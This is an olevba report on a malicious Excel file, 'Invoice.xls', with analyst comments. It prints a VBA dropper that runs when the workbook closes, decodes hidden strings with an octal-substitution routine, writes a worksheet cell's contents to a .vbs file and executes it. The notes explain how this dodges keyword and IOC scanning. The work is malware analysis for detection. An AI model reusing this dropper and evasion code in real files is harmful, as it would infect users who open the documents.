- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:M-S---- Invoice.xls
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: Invoice.xls
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ЭтаКнига.cls
- in file: Invoice.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Analyst note: Workbook_BeforeClose is the Excel workbook event procedure that fires when
- ' the workbook is being closed. Its only statement calls hjgHGjkdg, the Sub defined in
- ' Module1, so the chain starts on close rather than on open.
- ' The report's flags line (M and S only) does not mark the file as auto-executable, and
- ' this module's ANALYSIS section reports nothing; the trigger is only visible by reading
- ' the handler itself.
- Private Sub Workbook_BeforeClose(Cancel As Boolean)
- hjgHGjkdg
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO Лист1.cls
- in file: Invoice.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04421'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Option Explicit
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO Лист2.cls
- in file: Invoice.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04422'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Option Explicit
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO Лист3.cls
- in file: Invoice.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04423'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: Invoice.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Analyst note: dropper routine, called from Workbook_BeforeClose. Every string that would
- ' match a keyword or IOC rule (path, COM ProgIDs, sheet name, cell address) is passed
- ' through DecryptEPI at run time, so none of them appears in clear text in the VBA source.
- ' NOTE(review): the encoded literals as pasted here look lossy (non-printable bytes do not
- ' survive a text paste); decode from the original file, not from this page.
- Sub hjgHGjkdg()
- Dim PathToSave
- ' Output path. It is expanded with ExpandEnvironmentStrings below, so it contains an
- ' environment variable; the surviving characters appear to decode to a path under
- ' %APPDATA% ending in .vbs - confirm against the sample.
- PathToSave = DecryptEPI("-exxhe|e-†“–kjj—£’8¦Ž£")
- Dim WshShell
- ' COM object providing ExpandEnvironmentStrings and Run; those members match
- ' WScript.Shell (presumably the decoded ProgID - verify).
- Set WshShell = CreateObject(DecryptEPI("{¢— ¤8{–‘šš"))
- PathToSave = WshShell.ExpandEnvironmentStrings(PathToSave)
- ' COM object with Mode/Type/Open/WriteText/SaveToFile; those members match ADODB.Stream
- ' (presumably the decoded ProgID - verify). s is never declared with Dim.
- Set s = CreateObject(DecryptEPI("ehuhf8{¤¢‘›"))
- ' If s is an ADODB.Stream: Mode 3 = read/write, Type 2 = text.
- s.Mode = 3
- s.Type = 2
- s.Open
- ' The text written out is the value of a worksheet cell (sheet name and range are both
- ' encoded). The dropped content therefore lives in the sheet data, not in the macro
- ' source, which is why this report lists no IOCs for it.
- s.WriteText Worksheets(DecryptEPI("’™")).Range(DecryptEPI("h><")).Value
- ' Second argument 2: for ADODB.Stream this is create-or-overwrite.
- Call s.SaveToFile(PathToSave, 2)
- ' Executes the file just written. For detection, this shows up as Excel writing a file
- ' and then launching it through the shell object.
- WshShell.Run PathToSave
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+--------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | WriteText | May create a text file |
- | Suspicious | SaveToFile | May create a text file |
- | Suspicious | Open | May open a file |
- | Suspicious | Run | May run an executable file or a system |
- | | | command |
- +------------+--------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: Invoice.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Analyst note: string decoder used by hjgHGjkdg for every sensitive literal.
- ' For each character of sString it takes the character code (Asc), passes it to Oct2Dec,
- ' and appends Chr of the result to the output. There is no key; the mapping is a fixed
- ' per-character substitution, so the same input character always decodes the same way.
- ' Returns the decoded string (empty when sString is empty, as the loop does not run).
- Public Function DecryptEPI(sString As String) As String
- Dim I As Integer
- Dim sLen As Integer, sBuffer As String
- sLen = Len(sString)
- For I = 1 To sLen
- ' Asc yields a number; Oct2Dec takes a String parameter, so the code reaches it as its
- ' decimal digit text.
- sBuffer = sBuffer & Chr(Oct2Dec(Asc(Mid(sString, I, 1))))
- Next I
- DecryptEPI = sBuffer
- End Function
- ' Analyst note: reads the digits of Number as an octal numeral and returns its value.
- ' Digits are taken right to left (StrReverse) and each is multiplied by 8 ^ position.
- ' As called from DecryptEPI, Number is the decimal text of a character code, so the
- ' decimal digits are reinterpreted as octal: e.g. code 101 ("e") gives 65 ("A").
- Private Function Oct2Dec(Number As String) As Integer
- Dim I As Integer
- ' sLen is declared As String but holds Len(Number); it is coerced back to a number when
- ' used as the loop bound.
- Dim sLen As String, sBuffer As Integer, iNumb As Integer
- sLen = Len(Number)
- ' The loop runs 0 To sLen, one position past the last digit. On that extra pass Mid
- ' returns an empty string and Val of it is 0, so nothing is added.
- For I = 0 To sLen
- iNumb = Val(Mid(StrReverse(Number), I + 1, 1))
- sBuffer = sBuffer + ((8 ^ I) * iNumb)
- Next I
- Oct2Dec = sBuffer
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+------------+-----------------------------------------+
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | StrReverse | May attempt to obfuscate specific |
- | | | strings |
- +------------+------------+-----------------------------------------+